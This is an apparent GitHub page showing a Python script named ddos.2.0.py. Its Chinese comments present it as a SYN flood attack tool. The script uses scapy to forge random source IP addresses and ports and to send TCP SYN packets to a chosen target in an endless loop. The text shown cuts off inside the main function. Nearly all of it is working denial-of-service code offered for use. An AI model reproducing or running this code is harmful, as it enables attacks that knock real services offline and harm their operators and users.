-
Notifications
You must be signed in to change notification settings - Fork 1
/
Copy pathddos.2.0.py
61 lines (51 loc) · 1.44 KB
/
ddos.2.0.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
# beloved/DHS
"""
========================================
Name:DDos.2.0 Author: Lalevin Martin
Mailbox: [email protected]
Github: http://github.com/nacglalevin
Written in 2023-11-8
==================NACG==================
"""
import random
import sys
import socket
from scapy.all import *
class SynFlood(object):
def __init__(self):
self.targetIP = ''
self.targetPort = 0
self.srcList = []
# 构造伪造的源IP地址
def randIP(self):
# 随机生成IP地址,预设为192.168.1.x
x = random.randint(0, 255)
return '192.168.1.' + str(x)
# 构造伪造的源端口号
def randPort(self):
# 随机生成端口号
return random.randint(1024, 65535)
# 伪造源IP地址和源端口号,发送SYN包
def synFlood(self):
# 构造IP数据包
ipPacket = IP()
ipPacket.src = self.randIP()
ipPacket.dst = self.targetIP
# 构造TCP数据包
tcpPacket = TCP()
tcpPacket.sport = self.randPort()
tcpPacket.dport = self.targetPort
tcpPacket.flags = 'S'
# 发送SYN包
packet = ipPacket / tcpPacket
send(packet)
# 发送SYN包的入口函数
def run(self):
print('开始SYN攻击...')
# 循环发送SYN包
while True:
self.synFlood()
# 主函数
def main():
# 创建SYN攻击对象
synf